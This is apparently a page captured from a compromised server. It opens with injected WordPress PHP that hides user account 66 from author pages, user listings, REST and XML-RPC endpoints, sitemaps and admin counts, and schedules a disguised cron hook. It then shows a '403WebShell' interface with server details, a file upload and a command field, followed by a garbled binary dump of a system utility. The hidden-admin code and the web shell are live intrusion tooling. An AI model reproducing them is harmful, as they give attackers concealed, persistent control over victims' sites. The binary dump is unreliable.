add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /bin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /bin/pdfdetach
ELF�@*@�@8	@@@@��888�4�4�����������00TTTDDP�td�2�2�2\\Q�tdR�td������@@/lib/ld-linux-aarch64.so.1GNU.��$��"��.!����7�c�GNU�bG�� O\�A�6� ��@�x���"rb0]"F�k�]d���s����(� V�/�S��__libc_start_main__cxa_finalizeabortstrlen__stack_chk_failmemcpymemmovestderr__fprintf_chkstrcmpstrncpy__isoc23_strtol__memcpy_chkstdout__printf_chkfwritefputc_ITM_deregisterTMCloneTable__gmon_start___ITM_registerTMCloneTablegatof_ZN13PDFDocFactory12createPDFDocERK9GooStringRKSt8optionalIS0_ES6_Pv_ZN7Catalog12embeddedFileEi_ZN7EmbFile4saveEPKc_ZN6PDFDocD1Ev_ZN8FileSpec15getEmbeddedFileEv_ZN4Page9getAnnotsEP4XRef_ZN12GlobalParams15getTextEncodingEv_Z5error13ErrorCategoryxPKcz_ZNK10UnicodeMap10mapUnicodeEjPci_ZN13PDFDocFactoryD1Ev_ZN12GlobalParams15setTextEncodingEPKc_ZN7Catalog11getNumPagesEv_ZN8FileSpecD1Ev_ZN7Catalog23getEmbeddedFileNameTreeEv_ZN12GlobalParamsC1EPKc_ZN7Catalog7getPageEi_ZN8FileSpecC1EPK6Object_ZN13PDFDocFactoryC1EPSt6vectorIP13PDFDocBuilderSaIS2_EE_ZN12GlobalParamsD1EvglobalParamspdfDocEncoding_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE13_S_copy_charsEPcPKcS7__ZSt20__throw_length_errorPKc_ZdlPvm_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE10_M_replaceEmmPKcm_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEC2EOS4__Znwm_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE9_M_createERmm_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE10_M_disposeEv__stack_chk_guardlibpoppler.so.134libstdc++.so.6libc.so.6ld-linux-aarch64.so.1GLIBC_2.17GLIBC_2.34GLIBC_2.38GLIBCXX_3.4CXXABI_1.3.9GLIBCXX_3.4.21POPPLER_134	' ���=@���	H���S���=@t)�^yѯjq��w�4a����P+�+��.���0���0���0 �(10��@�81H�h1X�h�x1p��1������1���1�����1���1���1�2��@� 2�H2 �0�P28�x2H�X��2`��2p����2���2�����2���2����2�����������+�-�/��2H�P�X�`�h�	p�
x�����
��������������������������  �!(�"0�#8�$@�%H�&P�'X�(`�)h�*p�,x�.��0��1��3��4��5 �{�������{���_��{����"G�9� � � � ���&G�"9� ���*G�B9� ���.G�b9� ���2G��9� ���6G��9� ���:G��9� ���>G��9� ���BG�:� ���FG�":� ���JG�B:� ���NG�b:� ���RG��:� ���VG��:� ���ZG��:� ���^G��:� ���bG�;� ���fG�";� ���jG�B;� ���nG�b;� ���rG��;� ���vG��;� ���zG��;� ���~G��;� ����G�<� ����G�"<� ����G�B<� ����G�b<� ����G��<� ����G��<� ����G��<� ����G��<� ����G�=� ����G�"=� ����G�B=� ����G�b=� ����G��=� ����G��=� ����G��=� ����G��=� ����G�>� ����G�">� ����G�B>� ����G�b>� ����G��>� �?#�{�����S��[��c��k��s��C����B�G��*��9�R@@��g�����3��������O��
����c��q�T��*�;� �~@��~}����z{��@9?�q!T�@9?�q�
T�
@9�
5�Q�k*T�
Q �BK��B���B�}�"����*���P9�D�R9_qR9!�4�6�е�G�A�R��c�=�B�=��@��sb?��������@���A�R�c >������@����A�Rc�?������R9�.6�+@���w�R���3@���!�����cB9@<7�C9�;7����2������������G��gB�@�B���!jT�C��*�SA��[B��cC��kD��sE��{ƨ�#�_�����3@'�|
@��q�T��>����4`�B� �����k��T����q�T�T|4�kk$T յQ�kj6T�R!�R!}�� � x{��z;�{��k���T_q9���q�T�qAT�kJ��TT@�s
@��?���3���b@����
Q����������k��T"�RA�R��!�R?qAz���
q��*`�5��R9�7R9����7�ґ����@����/��е�G�����E�҈����������@������������E��y�����@�@R9�,5�@������F���B��B@9qa9T����B������@9qa7T����#������������������������#@���K���`�A9���76`.@��R�C���@��k`.@��T���*U���������'@�����n�����	��?���`.@�����@��k`.@����T�����*�C����R_q�T+�k %T`.@���*F���@����ғ��� $��@�_��T��{#���T|@��@�DqA��T	���������������'��@������'@�����9����@�	��
����`
@�!�R�Q9�k��T"�R�*?���?k��TF@���R�@9!�Q?j�������ha8#�Q$q(T �A@8#�Q$q���T?�q`TC@9��a�Q?$qT�@8a�Q?$q���T K��@4cxq�TA�@@8��R�Qj"��@@9�Q$qH�TA@8!�Q?$q���T@@9��5s
@����
Q��`��kK�T������G��Q�A�RB =�@�F����k��T����k��TA@��
Q`
@�b@�BQB|@����`
@�a����8�k��T���@@���R@9!�Q?j�����ha8#�Q$q�TA@8#�Q$q���T�5s
@�B�R�ҵ
Q	���`��k��Ti������B'�`�;��R �������B��k֢�`����@�A�R��c@�B�������@�A�R��c��B ������&�@��B'�s�;�C���{���"<���A�R������<�d���@�"��A�R���@����@��A�RB�����@�C�A�R�����B����@���A�RBc�����@�����K�
@�? q�T ����#�� ����TA����T���;��������@��D�q�Zz-T�B�<���`�R3����gE�w�R��@�T�� Ֆ@�����M�����	������"�?��T�����9s���"������c9o������R��@�"�������!�����?�q��TB����gE�����R9�3�:�Z�C��/�@7�@�R9�7��6���G����#����@��/@�k�)T�@�@9�5�@�����@��z`�@��%��@��T�@�"@9_�q`%T�3@��R�k�T������#����b8� *���R��c���?�|@����##��A�z� �!�� ����@�_�BT������A����@��kJT�����@���@��|8��5�@��*xa����������#�������������������>���#��������������������.���+@�7�R����4�@����	�zw���@�@����@4���/@�k��T���D�q�Zz�TQ�B9��|}��jw��5@�:�A@�?�T@@�@9_�q�T�R�7@��#������[�����B�G���"B�y8A *���R�����|@��@�����҄#���� ��#�� � ��� ����"T������������@��*A@�����k�TB@�A�`8[��5�@�xa����B����@�R?�������������2���1�����@�9�z`�`���`�(@�?@q T? q�
T�@������@�!�����7�����B����RW�R!����gE���@���������Rk�@�Ѓ��T|@�����/�������R�������j48���*����G�!@���Z�G�@�R{�����������/@�kM
T�@�"@�Rp����zy�@���`@��Ta@�"@9_�qT�@��R�kjT�������b8� *���R��k���@�|@�!����
���`@��kjT`@���|8��5A{a��*����G����@�9�@�@�R�����!@9?�q�T�3@�\�R���gE�w�R���!@9?�q��T�7@�\�R��{��9�jw���`���(@�?@q ��T? q���T������6�gE��Rx���@�� ��_k��T�B`<�k��'�����w��@9@�R�7@�_�q�@��B��7��� � � � � � � � � � � � � � � � ��������@��#������G�����
����������G�@�����_� � �������!��?�T��!�G�a����_�������!��!�"��A��!�A�����B�G�b����_� �?#�{��������`�A9@7���G�����@�������� �R`�9�@��{¨�#�_�_$��� � ��B�:�?#���{����R��5���h���?#�{�����S����[����@���`T���@�����`��SA��[B��{Ũ�#�_�c���@��#����C�� T��T����T���@����ҿ���%����� �d�@�D��_��TT ���!�������yR�w
��SA��[B��cC��#@��{Ũ�#�_��T������}���������@�a
@� k6������T4#����}���c���w�}���@;����?#��{��C��S�������!�G��[�@�"@�����u���L�������<��T�����������@�a�b@����G�_h!8�@�@�B���T�{A��SB��[C����#�_����������@���`�a
��1���?#�{�����@9�S����6������aA��@��A�?�T��Ta
��
@�b
@�a
��������
���?9�� �R`�9�SA��{¨�#�_���T��_�T����`@��@�b�h"8�@��a
��
@�`
�������B@99`@��@�� �{�����{���_�Call to dead objectvector::_M_realloc_insert-list <int> <fp> <string>Invalid file nameInvalid file numberInternal error in arg table
24.02.0pdfdetach version %s
Copyright 2005-2024 The Poppler Developers - http://poppler.freedesktop.org%s
Copyright 1996-2011, 2022 Glyph & Cog, LLCpdfdetachUsage: %s [options]<PDF-file> %s
  %s%-*s: %sCouldn't get text encoding%d embedded files
%d: Error saving embedded file as '{0:s}'list all embedded files-savesave the specified embedded file (file number)-savefilesave the specified embedded file (file name)-saveallsave all embedded files-ofile name for the saved embedded file-encoutput text encoding name-opwowner password (for encrypted files)-upwuser password (for encrypted files)-vprint copyright and version info-hprint usage information-help--help-?;X
������p�������T�����������������4���X����zRx���4A,X���0@t���<$T����PA-A ��B�N���A-|��������$C-B��L����\A-AP�
�	B��B��L
������A-AA��C�a
��A�A������A-A0����A-A@A��B��E��^
������A-A(4p����A-A ��C��\
����A-AH`T�DA-A`��G�
�
�	��������m
`G������������A-AP++�.�0�0�0(1��81h1x1�1��1�1��1�1!�12@! 2H2P2x2�2�2�2�2�2�2�2�'�
�.������o���
�0� ���	���o���o���o�o�
���o+����������������������������������������������/usr/lib/debug/.dwz/aarch64-linux-gnu/poppler-utils.debug���W��FB^Ϡs��ӂ�c31aea24948222d7e12e21bffcf0f237b063d0.debug8z�^.shstrtab.interp.note.gnu.build-id.note.ABI-tag.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.data.rel.ro.dynamic.got.data.bss.gnu_debugaltlink.gnu_debuglink88TT$&xx 4���o��>��F���N���o�
�
l[���o�j���tB�� ~��y�������@��.�.��.�.���2�2\�33������������0���0�0�0���a�pa �aN�4�

Youez - 2016 - github.com/yon3zu
LinuXploit